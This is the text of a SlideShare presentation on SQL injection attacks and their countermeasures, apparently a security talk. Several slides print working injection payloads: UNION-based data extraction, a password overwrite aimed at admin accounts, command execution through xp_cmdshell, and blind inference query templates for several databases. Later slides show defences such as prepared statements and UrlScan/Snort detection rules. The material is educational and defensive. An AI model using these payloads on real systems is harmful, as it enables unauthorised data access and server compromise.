Web application attacks using Sql injection and countermasures
Download as ppt, pdf5 likes3,714 views
The document provides a comprehensive overview of SQL injection attacks, including their definitions, techniques, exploitation methods, and preventive measures. It emphasizes the importance of input validation, user permissions, and the use of stored procedures to mitigate risks. The document also discusses vulnerabilities associated with SQL servers and presents various attack scenarios and countermeasures.
![INPUT CHECKING FUNCTIONS
Built in character rejection
$sql = “SELECT * FROM Users WHERE ID
= ‘” . $_GET[‘id’] . “’”;
$sql = “SELECT * FROM Users WHERE ID
=” .
mysql_real_escape_string($_GET[‘id’]
);
$result = mysql_query($sql);
Introduction Background Techniques Prevention Demo Conclusions Questions](https://image.slidesharecdn.com/sqlinjectionattacks-120824094959-phpapp01/85/Web-application-attacks-using-Sql-injection-and-countermasures-37-320.jpg)
![WHITELIST INPUT VALIDATION
UrlScan v3.0
restricts the types of HTTP requests that IIS will
process
[SQL Injection Headers]
AppliesTo=.asp,.aspx
[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
delete
drop
exec
insert
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"SQL Injection "; flow:to_server,established;
SNORT
uricontent:".php | .aspx | .asp";
pcre:"/(%27)|(')|(--)|(%23)|(#)/i";
Create rule to check for SQL attack
classtype:Web-application-attack; sid:9099; rev:5;)](https://image.slidesharecdn.com/sqlinjectionattacks-120824094959-phpapp01/85/Web-application-attacks-using-Sql-injection-and-countermasures-44-320.jpg)
Web application attacks using Sql injection and countermasures
- 1. SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
- 2. OUTLINE Background of SQL Injection Techniques and Examples Preventing SQL Injection Demo Wrap-Up Questions Introduction Background Techniques Prevention Demo Conclusions Questions
- 3. BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
- 4. DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
- 5. WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
- 6. FLEXIBILITY = VULNERABILITY Simple Injection Decoding Error Messages Blind Injection Encoding Exploits Stored Procedures --- Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
- 7. SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
- 8. IMPORTANT SYMBOLS ‘ “Hack” -- “Comment Out” ; “End Statement” %,* “Wildcards”
- 9. SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
- 10. EXAMPLE: DATABASE SCHEMA Table Users Has columns “username” and “password” Accessed when users log in Table Customers Has column “phone” Users can look up other customer phone numbers by name Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
- 11. RETURNING EXTRA ROWS WITH “UNION” Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’ Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
- 12. MODIFYING RECORDS Application has password changing page SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’ Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
- 13. MS SQL SERVER Default SQL Server setup Defaultsystem admin account “sa” enabled No password!!! Supports multiple queries “Extended stored procedures”: C/C++ DLL files Read/writeexternal files Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
- 14. EXPLOITING SQL SERVER Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’ Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
- 15. DATA-MINING WITH SQL INJECTION Three classes of data-mining In-band Out-of-band Inference
- 16. IN-BAND ATTACKS Data is included in response from the web server Could be a well rendered web page Using UNION SELECTS Error messages
- 17. OUT-OF-BAND ATTACKS Data is retrieved using another communication channel: UTL_HTTP.REQUEST OPENROWSET XP_SENDMAIL
- 18. INFERENCE ATTACKS At the core of inference is a question Action taken based upon the answer Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
- 19. INFERENCE ATTACKS…CONT: Examples: Time Delay Generate 200/500 responses Response Variation Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
- 20. INFERENCE ATTACKS…CONT: CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
- 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
- 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT: Notes: Works well with SQL Server, Oracle, DB2 MySQL returns NULL Informix ODBC driver returns 200 – even in event of error Response code could be 302 Redirect, etc – principle is the same. Leaves a large number of 500 response in log files App Environments like PL/SQL will return 404 instead of 500
- 23. INFERENCE THROUGH RESPONSE VARIATIONS: Parameter Splitting and Balancing Avoids 500 responses
- 24. PARAMETER SPLITTING AND BALANCING ‘NGSSOFTWARE’ ‘NGSSOFTWA’+’RE’ ‘NGSSOFTWA’||’RE’ ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’ ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’ 2 1 +1 1 + (SUBSELECT RETURNS 1)
- 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS Cold Fusion Management Converts “ to " Converts & to & Converts > to > Converts < to < Doubles up single quotes Usually means attack vector is numeric input PHP often doubles single quote – magic quotes
- 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT: Rather than > use BETWEEN X AND Y Rather than & use ^ A xor BIT = C if C is greater than A then Bit is not set If C is less than A then Bit is set Rather than ‘A’ use CHR(65)/CHAR(65)
- 27. INFERENCE QUERIES… SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
- 28. INFERENCE QUERIES… Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
- 29. INFERENCE QUERIES… Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
- 30. INFERENCE QUERIES… MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
- 31. INFERENCE QUERIES… MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
- 32. INFERENCE QUERIES… Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
- 33. INFERENCE QUERIES… Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
- 34. PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
- 35. PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
- 36. INPUT VALIDATION Checks Type Size Format Range Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
- 37. INPUT CHECKING FUNCTIONS Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
- 38. ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
- 39. USER PERMISSIONS Limit query access rights SELECT UPDATE DROP Restricted statement access Global-specific Database-specific Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
- 40. VARIABLE PLACEHOLDERS (?) Defense from String Concatenation Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
- 41. STORED PROCEDURES Use error checking variables Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
- 42. DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
- 43. COUNTERMEASURES System Administrators White List / Blacklist Input Validation Least Privileges Application firewalls Developer StoredProcedures Parameterized queries Exception handling
- 44. WHITELIST INPUT VALIDATION UrlScan v3.0 restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established; SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i"; Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
- 45. LEAST PRIVILEGES Enforce least privileges CREATE / DELETE Does not guarantee security Access to portion of data Create views
- 46. CONCLUSIONS SQL Injection continues to evolve with new technologies Dangerous Effects Access to critical information Updating data not meant to be updated Exploiting DBMS to directly affect the server and its resources Prevention of SQL Injection Input Validation and Query Building Permissions and Access Rights Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
- 47. QUESTIONS 1) What could prevent the ‘Students’ table from being dropped? 2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
- 48. REFERENCES Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>. Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433. "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>. Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>. Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
- 49. Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: [email protected] [email protected] Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions
Editor's Notes
- #15: RFID virus uses MS SQL Server commands.
- #38: PHP example
- #42: May remove this slide
- #43: http://sacs.ucf.edu/ccr/cct_welcome.asp
- #45: What is WhiteList/Blacklist input validation - explain Choose whitelist over black list it much easier to accept valid states than it is to denythem
- #46: This will not prevent SQL injection attack but it will minimize it. Create/Delete – you application will most likely never have to create and drop tables at runtime Elevation of privileges Views should only access data that is required for the application